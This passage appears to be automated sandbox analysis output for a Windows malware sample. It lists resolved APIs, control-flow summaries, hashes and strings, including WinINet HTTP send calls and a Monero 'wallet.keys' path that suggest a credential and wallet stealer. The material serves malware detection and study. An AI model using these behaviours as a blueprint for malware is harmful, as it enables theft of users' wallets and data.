                      • GetProcAddress.KERNEL32(75BD0000,01082200), ref: 003E9B5D
                      • GetProcAddress.KERNEL32(75450000,01075730), ref: 003E9B7E
                      • GetProcAddress.KERNEL32(76E90000,01088F90), ref: 003E9B9F
                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 003E9BB6
                      Strings
                      • NtQueryInformationProcess, xrefs: 003E9BAA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: NtQueryInformationProcess
                      • API String ID: 2238633743-2781105232
                      • Opcode ID: 1e7e25b7ace2abe76804dbbe928c0ceb7bcaa18713b73d117844f50a4d558792
                      • Instruction ID: ff25942bdf00ea07d6136fa8eac393fdb9aa346708b50056d184980c1804df31
                      • Opcode Fuzzy Hash: 1e7e25b7ace2abe76804dbbe928c0ceb7bcaa18713b73d117844f50a4d558792
                      • Instruction Fuzzy Hash: 7BA16DB95022409FD385DFE9ED88AE237FBF74831170CE61BE605C32A5D6399542CB52
                      Function 003D45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 764 3d45c0-3d4695 RtlAllocateHeap 781 3d46a0-3d46a6 764->781 782 3d46ac-3d474a 781->782 783 3d474f-3d47a9 VirtualProtect 781->783 782->781
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D460E
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 003D479C
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D471E
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45DD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4729
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D477B
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46B7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4657
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4770
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4683
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4643
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45E8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4662
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4622
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45F3
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D473F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D45C7
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D46D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D4617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 003D462D
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: d3108930387ff8498c5d14f24a585d0c74d1a47b0d10b9dfc430c28794d1f426
                      • Instruction ID: 2ff97c844a735dabcaff516ce6356989173b2d2d9243d6dce80273651733366b
                      • Opcode Fuzzy Hash: d3108930387ff8498c5d14f24a585d0c74d1a47b0d10b9dfc430c28794d1f426
                      • Instruction Fuzzy Hash: A241DE726E66087EEB2ABFA49C42EED7E765F46B08F509044EF14527A0CFB067034527
                      Function 003D4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 801 3d4880-3d4942 call 3ea7a0 call 3d47b0 call 3ea740 * 5 InternetOpenA StrCmpCA 816 3d494b-3d494f 801->816 817 3d4944 801->817 818 3d4ecb-3d4ef3 InternetCloseHandle call 3eaad0 call 3d9ac0 816->818 819 3d4955-3d4acd call 3e8b60 call 3ea920 call 3ea8a0 call 3ea800 * 2 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea920 call 3ea8a0 call 3ea800 * 2 InternetConnectA 816->819 817->816 829 3d4ef5-3d4f2d call 3ea820 call 3ea9b0 call 3ea8a0 call 3ea800 818->829 830 3d4f32-3d4fa2 call 3e8990 * 2 call 3ea7a0 call 3ea800 * 8 818->830 819->818 905 3d4ad3-3d4ad7 819->905 829->830 906 3d4ad9-3d4ae3 905->906 907 3d4ae5 905->907 908 3d4aef-3d4b22 HttpOpenRequestA 906->908 907->908 909 3d4ebe-3d4ec5 InternetCloseHandle 908->909 910 3d4b28-3d4e28 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea9b0 call 3ea8a0 call 3ea800 call 3ea920 call 3ea8a0 call 3ea800 call 3ea740 call 3ea920 * 2 call 3ea8a0 call 3ea800 * 2 call 3eaad0 lstrlen call 3eaad0 * 2 lstrlen call 3eaad0 HttpSendRequestA 908->910 909->818 1021 3d4e32-3d4e5c InternetReadFile 910->1021 1022 3d4e5e-3d4e65 1021->1022 1023 3d4e67-3d4eb9 InternetCloseHandle call 3ea800 1021->1023 1022->1023 1024 3d4e69-3d4ea7 call 3ea9b0 call 3ea8a0 call 3ea800 1022->1024 1023->909 1024->1021
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003D4915
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D4ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,003F0DDB,00000000,?,?,00000000,?,",00000000,?,0108E9D8), ref: 003D4DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003D4E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003D4E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 003D4E49
                      • InternetCloseHandle.WININET(00000000), ref: 003D4EAD
                      • InternetCloseHandle.WININET(00000000), ref: 003D4EC5
                      • HttpOpenRequestA.WININET(00000000,0108E7F8,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D4B15
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • InternetCloseHandle.WININET(00000000), ref: 003D4ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: b2daa9293317314cf7bcb156d792d3078d1844ac52e3dbce96868c16887deef1
                      • Instruction ID: c6c42e245804e3cd6cf854ca87be08459e56ee064d990473473c8a50a0191e7f
                      • Opcode Fuzzy Hash: b2daa9293317314cf7bcb156d792d3078d1844ac52e3dbce96868c16887deef1
                      • Instruction Fuzzy Hash: 50125F72910668AADB16EB91DC92FEEB779AF14300F514299F106660D2DF303F49CF62
                      Function 003E7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003D11B7), ref: 003E7880
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E7887
                      • GetUserNameA.ADVAPI32(00000104,00000104), ref: 003E789F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser
                      • String ID:
                      • API String ID: 1296208442-0
                      • Opcode ID: 54ec586eed9b4c572b3c181264093c0ccd904b9fc06a84219ddde83d9b3c2313
                      • Instruction ID: 07aaddc899efa401a5e479238e2fbce6506d8bebe267ca667b39efe58f524b6f
                      • Opcode Fuzzy Hash: 54ec586eed9b4c572b3c181264093c0ccd904b9fc06a84219ddde83d9b3c2313
                      • Instruction Fuzzy Hash: C7F04FB1D44249ABC710DFD9DD4ABEEBBB8EB04711F10425AFA05A2680C77415048BA2
                      Function 003D1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitInfoProcessSystem
                      • String ID:
                      • API String ID: 752954902-0
                      • Opcode ID: d5678e7b1cf5a102b73f1230d10f6a3beaf0db28766593282885eb45d04de94d
                      • Instruction ID: 7d801c7ade49f8edeadb0f1b9fef6ceaa6a11329d4dda0c4eea96b2acce92297
                      • Opcode Fuzzy Hash: d5678e7b1cf5a102b73f1230d10f6a3beaf0db28766593282885eb45d04de94d
                      • Instruction Fuzzy Hash: 6DD05E7890130CEBCB00DFE0D8496DDBB79FB0C321F04155AD90562380EA305581CAA6
                      Function 003E9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 633 3e9c10-3e9c1a 634 3ea036-3ea0ca LoadLibraryA * 8 633->634 635 3e9c20-3ea031 GetProcAddress * 43 633->635 636 3ea0cc-3ea141 GetProcAddress * 5 634->636 637 3ea146-3ea14d 634->637 635->634 636->637 638 3ea216-3ea21d 637->638 639 3ea153-3ea211 GetProcAddress * 8 637->639 640 3ea21f-3ea293 GetProcAddress * 5 638->640 641 3ea298-3ea29f 638->641 639->638 640->641 642 3ea337-3ea33e 641->642 643 3ea2a5-3ea332 GetProcAddress * 6 641->643 644 3ea41f-3ea426 642->644 645 3ea344-3ea41a GetProcAddress * 9 642->645 643->642 646 3ea428-3ea49d GetProcAddress * 5 644->646 647 3ea4a2-3ea4a9 644->647 645->644 646->647 648 3ea4dc-3ea4e3 647->648 649 3ea4ab-3ea4d7 GetProcAddress * 2 647->649 650 3ea515-3ea51c 648->650 651 3ea4e5-3ea510 GetProcAddress * 2 648->651 649->648 652 3ea612-3ea619 650->652 653 3ea522-3ea60d GetProcAddress * 10 650->653 651->650 654 3ea67d-3ea684 652->654 655 3ea61b-3ea678 GetProcAddress * 4 652->655 653->652 656 3ea69e-3ea6a5 654->656 657 3ea686-3ea699 GetProcAddress 654->657 655->654 658 3ea708-3ea709 656->658 659 3ea6a7-3ea703 GetProcAddress * 4 656->659 657->656 659->658
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,01075650), ref: 003E9C2D
                      • GetProcAddress.KERNEL32(74DD0000,01075910), ref: 003E9C45
                      • GetProcAddress.KERNEL32(74DD0000,01089580), ref: 003E9C5E
                      • GetProcAddress.KERNEL32(74DD0000,010895B0), ref: 003E9C76
                      • GetProcAddress.KERNEL32(74DD0000,010895E0), ref: 003E9C8E
                      • GetProcAddress.KERNEL32(74DD0000,01089598), ref: 003E9CA7
                      • GetProcAddress.KERNEL32(74DD0000,0107BED0), ref: 003E9CBF
                      • GetProcAddress.KERNEL32(74DD0000,0108D210), ref: 003E9CD7
                      • GetProcAddress.KERNEL32(74DD0000,0108D360), ref: 003E9CF0
                      • GetProcAddress.KERNEL32(74DD0000,0108D258), ref: 003E9D08
                      • GetProcAddress.KERNEL32(74DD0000,0108D1B0), ref: 003E9D20
                      • GetProcAddress.KERNEL32(74DD0000,01075890), ref: 003E9D39
                      • GetProcAddress.KERNEL32(74DD0000,01075970), ref: 003E9D51
                      • GetProcAddress.KERNEL32(74DD0000,01075710), ref: 003E9D69
                      • GetProcAddress.KERNEL32(74DD0000,01075750), ref: 003E9D82
                      • GetProcAddress.KERNEL32(74DD0000,0108D378), ref: 003E9D9A
                      • GetProcAddress.KERNEL32(74DD0000,0108D3A8), ref: 003E9DB2
                      • GetProcAddress.KERNEL32(74DD0000,0107BCF0), ref: 003E9DCB
                      • GetProcAddress.KERNEL32(74DD0000,01075790), ref: 003E9DE3
                      • GetProcAddress.KERNEL32(74DD0000,0108D2B8), ref: 003E9DFB
                      • GetProcAddress.KERNEL32(74DD0000,0108D228), ref: 003E9E14
                      • GetProcAddress.KERNEL32(74DD0000,0108D270), ref: 003E9E2C
                      • GetProcAddress.KERNEL32(74DD0000,0108D2D0), ref: 003E9E44
                      • GetProcAddress.KERNEL32(74DD0000,010757B0), ref: 003E9E5D
                      • GetProcAddress.KERNEL32(74DD0000,0108D348), ref: 003E9E75
                      • GetProcAddress.KERNEL32(74DD0000,0108D3C0), ref: 003E9E8D
                      • GetProcAddress.KERNEL32(74DD0000,0108D138), ref: 003E9EA6
                      • GetProcAddress.KERNEL32(74DD0000,0108D288), ref: 003E9EBE
